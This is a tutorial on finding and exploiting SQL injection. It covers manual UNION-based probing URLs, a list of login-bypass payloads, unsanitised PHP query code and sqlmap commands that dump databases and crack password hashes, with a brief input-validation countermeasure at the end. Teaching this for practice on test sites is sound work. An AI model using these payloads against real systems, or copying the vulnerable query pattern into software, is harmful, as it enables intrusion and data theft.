A quick tutorial to SQL injection with the tool SQLmap
SQL injection attack consist of two steps:
- Find a webpage vulnerable to SQL injections
- Exploit the vulnerable webpage with SQL injection
Find vulnerability
Webpage URL appended with /product.php?id=1 generates a query like
SELECT * FROM products WHERE id=1To test whether a website is vulnerable, a single quote ‘ can be added behind the webpage URL/product.php?id=1'generating an incorrect SQL query
SELECT * FROM products WHERE id=1'In case some kind of an error message is shown, this indicates that the website is vulnerable. When the webpage remains the same or isn’t found then this means it’s not vulnerable. Appending an odd number of single quotes cause error, while an even number of single quotes don't cause errors. The beginning of a SQL query cannot be modified since that is generated by the PHP source code that runs on the server.
PHP code:
$id = $_GET[“id”];
$result= mysql_query(“SELECT * FROM products WHERE id=”.$id);
$row = mysql_fetch_assoc($result);It may also be possible to comment end of a SQL query by appending ‘ —
such that
SELECT * FROM products WHERE month='sept' and id=1becomes
SELECT * FROM products WHERE month=’sept’ --‘ and id=1the last condition in the query for id number is commented out.
Exploit vulnerability
Determine the number of columns in a table, can be done by appending order by nr statement whereby the value of nr indicates which column determines how the output is ordered. This value of this column starts with 1 and increases until the page returns an error message, indicating that there doesn’t exist a column with that number.
http://www.website.com/index.php?id=1 order by 1
http://www.website.com/index.php?id=1 order by 2
http://www.website.com/index.php?id=1 order by 3
http://www.website.com/index.php?id=1 order by 4When the last statement causes an error message, this indicates that there are 3 columns in the table. In case it doesn’t work like above then try
http://www.website.com/index.php?id=1-- order by 1
http://www.website.com/index.php?id=1-- order by 2
http://www.website.com/index.php?id=1-- order by 3
http://www.website.com/index.php?id=1-- order by 4Another manner to determine the number of columns in a table is by appending UNION SELECT null, null,..,null FROM dual
The number of null in the SQL statement starts with 1 and increases until no error is thrown. SQL statement requires that both statements in UNION have the same number of columns (of the same type).
Vulnerable column(s) is found by appending union select 1,2,3 whereby the 1,2,3 are the column number discovered previously. Additionally, the id number is negated such that
http://www.website.com/index.php?id=-1 union select 1,2,3-- order by 1If we assume that column 2 is vulnerable, the vulnerable column number is replaced by version(), database() or user() to discover the specific parameters.
http://www.website.com/index.php?id=-1 union select 1,version(),3-- order by 1
http://www.website.com/index.php?id=-1 union select 1,database(),3-- order by 1
http://www.website.com/index.php?id=-1 union select 1,user(),3-- order by 1Another malicious input example that illustrates SQL injection is username: admin' -- results in the following statement
SELECT * FROM users WHERE username = 'admin'--' AND password = 'password'Other SQL injections
admin' #
admin'/*
' OR 1=1--
' OR 1=1#
' OR 1=1/*
') OR '1'='1--
') OR ('1'='1--SQLMap
SQL injection describes a trick to inject or manipulate SQL query as users can input parameters in the webpages that make a SQL query to the database. SQLmap is an opensource tool written in python to automate SQL injection which is otherwise manually very tedious. This is the most used tool to exploit websites that are vulnerable to SQL injections, whereby malicious SQL command is executed on the website’s database’ and extracts database information. Not only can the data in the database be modified, but even shell commands can be executed on the database with admin privileges. Other tools available that exploit SQL vulnerabilities are Havij and Pangolin.
In order to exploit SQL vulnerability this the following steps are done:
- Download SQLMap from http://sqlmap.sourceforge.net/, if not already installed on your OS (by default in Kali Linux)
- Find a vulnerable webpage URL like the one below:
Vulnerable webpages usually look like domain name appended with something like /listproducts.php?cat=1 that represent something like SELECT * FROM products WHERE cat=1. To test whether a website is vulnerable single quote ‘ can be added behind the webpage URL/listproducts.php?cat=1’and in case some kind of error is shown, then the website is vulnerable. When the webpage remains the same or isn’t found then it’s not vulnerable.
Exploiting a vulnerable website
Start the terminal and enter the command-line:
sqlmap -u url --options whereby URL is the address of a vulnerable webpage and --options the command-line is one of the options below:--dbs Extract a list of databases by means of enumerating--tablesExtract a list of tables by means of enumerating--columnsExtract a list of columns by means of enumerating--countExtracts the number of entries of the table--usersExtracts list of database users--passwordsExtracts a list of databases password hashes and attempts to cracks them with a dictionary attack--roles Extracts a list of user roles--priveleges Extracts list of user privileges
--dumpExtracts data entries in the table
sqlmap -h Show help
Example
Below is a simple example shown of SQL injection to a vulnerable target webpage http://testphp.vulnweb.com/listproducts.php?cat=1
Get the list of all the databases at the target webpage
Get the list of all the tables in database acuart
Get the list of all the columns in table products in database acuart
Show all entries of columns id, name, price in table products in database acuart
Cracking
It is very unlikely that passwords are stored in plaintext in the databases. In case hashes of the passwords are retrieved from the database, these can be cracked by password cracking tools like John the Ripper. Short and simple passwords are easily broken.
Countermeasure
Countermeasure to SQL injection vulnerability is to properly validate client input. This can be preferably implemented by making a list of input values allowed (whitelist).
MySQL has default databases information_schema and MySQL. The table information_schema contains information from all other tables in the database.
SELECT table_name FROM information_schema.tables
SELECT column_name FROM information_schema.columnsQueries automatically executed:
Fetching number of databases
SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR(1000)), CHAR(32)) FROM information_schema.SCHEMATARetrieve the first database
SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(1000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1Retrieve the second database
SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(1000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 1, 1Useful links
- https://github.com/sqlmapproject/sqlmap/wiki/Usage
- http://testphp.vulnweb.com/listproducts.php?cat=1 Vulnerable website to attack using practice SQL injection with sqlmap
